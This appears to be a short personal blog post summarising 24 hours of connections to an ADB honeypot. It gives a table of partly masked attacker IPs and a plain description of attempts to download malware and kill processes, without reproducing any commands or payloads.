I Found something realy interesting, a ADB Honeypot. I installed it one one of my servers via Docker. Than I waited for 24h.

Findings

after 24h

After 24h i logged back into my server and locked at the log data of the honeypot. If you want to take a look:

adbhoney.log

I analysed the data and here are my findings.

Table of connections

IDIPCountryASNConnectionsTot Time (s)Avg Time (s)Max Time (s)
1103.205.XXX.XXXVNAS149137145.345.345.3
2157.10.XXX.XXXVNAS1508623136.245.445.5
3198.235.XXX.XXXBEAS3969822000
4139.59.XXX.XXXINAS1406162732.2455.4748
545.200.XXX.XXXNLAS5058055.111
6154.213.XXX.XXXDEAS513963136.145.445.6
7154.213.XXX.XXXDEAS513965228.245.646
835.203.XXX.XXXGBAS3969821182.5182.5182.5
9104.167.XXX.XXXUSAS3990455228.345.745.8
10115.231.XXX.XXXCNAS58461120.920.920.9
11172.169.XXX.XXXUSAS80751160160160
12167.94.XXX.XXXDEAS398705412.73.29.1
13212.64.XXX.XXXTRAS197450145.945.945.9

Analysis

A total of 13 unique IPs contacted my honeypot. The first connection lasted 1h 38min and came from Vietnam. The attacker tried to download and run a script in the temp folder (/data/local/tmp/). I ran the script on virustotal and it says that the script is malware. Only 30 minutes later a new connection came from Vietnam. It also tried to download a script, but it also wanted to kill some processes based on CPU usage. The 3rd just connected and did nothing else, 2 times. The 4th IP came from India and connected 6 times but also never really did anything. The next IP came from the Netherlands and did not send anything. The next 2 IPs came from Germany and tried to download malware to my honeypot 3 times. The 8. IP came from the UK just connected and did nothing.

Final

So we found out that a lot of attackers trie to abuse ADB Devices.